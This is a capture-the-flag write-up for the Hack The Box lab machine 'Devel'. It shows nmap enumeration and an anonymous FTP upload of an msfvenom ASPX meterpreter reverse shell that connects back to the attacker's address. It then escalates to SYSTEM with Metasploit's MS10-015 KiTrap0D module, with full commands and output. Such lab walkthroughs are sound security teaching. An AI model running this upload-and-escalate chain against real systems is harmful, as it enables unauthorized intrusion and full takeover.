Hack The Box: Devel
About
Name: Devel
IP Address: 10.10.10.5
Operating System: Windows
Difficulty: 3.7/10
Base Points: 20
Enumeration
As always we start with a NMAP scan to discover open ports and services running on the server:
nmap -sC -sV 10.10.10.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-09 17:32 CET
Nmap scan report for 10.10.10.5
Host is up (0.038s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM DIR aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsLooking at the NMAP scan we have two ports open; 80 and 21.
We also have access to the FTP server if we login as Anonymous.
Initial Foothold
Going to the website reveals nothing special. Just a standard IIS page:
Let's check the FTP server as well.
ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 01:06AM DIR aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.Okay, we have read access. But what about write access? If we can write files to the FTP server we can probable upload code and get a reverse shell working.
Testing to see if we have write access confirms that we can write files to the FTP server and access the file through the HTTP server.
Let's create and upload an .aspx shell and see if we can get the server to connect back to us.
Create ASPX Shell And Upload
As usual we use msfvenom to create the shellcode. We specify that we want a meterpreter shell reverse_tcp. We will listen on port 4444, format will be aspx and the code should output to shell.aspx
msfvenom -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=10.10.14.8 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2814 bytesNow we need to upload the shell to server.
ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.aspx shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2850 bytes sent in 0.00 secs (33.5552 MB/s)Awesome! The shell uploads successfully!
Now we need to setup Metasploit to handle the connect-back and the second stage of the meterpreter session.
Metasploit
root@kali:~# msfdb run
[i] Database already started
. .
.
dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
' dB' BBP
dB'dB'dB' dBBP dBP dBP BB
dB'dB'dB' dBP dBP dBP BB
dB'dB'dB' dBBBBP dBP dBBBBBBB
dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
. . dB' dBP dB'.BP
| dBP dBBBB' dBP dB'.BP dBP dBP
--o-- dBP dBP dBP dB'.BP dBP dBP
| dBBBBP dBP dBBBBP dBBBBP dBP dBP
.
.
o To boldly go where no
shell has gone before
=[ metasploit v4.17.21-dev ]
+ -- --=[ 1822 exploits - 1033 auxiliary - 316 post ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(multi/handler) > set LHOST tun0
LHOST => 10.10.14.8
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.8:4444
I use the exploit/multi/handler with the windows/meterpreter/reverse_tcp payload.
I set the LPORT to the port we defined in our .aspx payload, and LHOST to tun0, which is my tunnel/vpn interface connecting to HackTheBox.
You can also specifiy your HTB IP-address instead of tun0.
Finally we run the exploit and it's now listening for something to connect back to us.
If we now go http://10.10.10.5/shell.aspx we will trigger our shellcode and we will get a connect-back.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.5:49158) at 2019-01-09 17:48:47 +0100
meterpreter > sysinfo
Computer : DEVEL
OS : Windows 7 (Build 7600).
Architecture : x86
System Language : el_GR
Domain : HTB
Logged On Users : 0
Meterpreter : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\Web
Awesome! The server connected back to us and we got a meterpreter shell!
But we are only running as ISS APPPOOL. So we need to escalate our privileges!
The server seems to be running Windows 7 so there should be a few vulnerabilities we can exploit.
Privilege Escalation
Metasploit has an awesome module called exploit_suggester. Let's run that on our session and see if we can discover potential exploits we can use to elevate our privileges.
meterpreter > background
[*] Backgrounding session 1...
msf > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 28 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
We background our meterpreter session and use the post module multi/recon/local_exploit_suggester.
We set it to search for exploit in session 1 (our meterpreter session) and run it.
We get quite a few suggestions back from the module. Let's try MS10_015.
msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Launching notepad to host the exploit...
[+] Process 3624 launched.
[*] Reflectively injecting the exploit DLL into 3624...
[*] Injecting exploit into 3624 ...
[*] Exploit injected. Injecting payload into 3624...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.8:4444 -> 10.10.10.5:49158) at 2019-01-09 18:25:47 +0100
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Boom! NT AUTHORITY/SYSTEM.
We can now grab both user.txt and root.txt.
C:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd6...4cb3e8
C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a0...c72b4b
Further Reading
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-015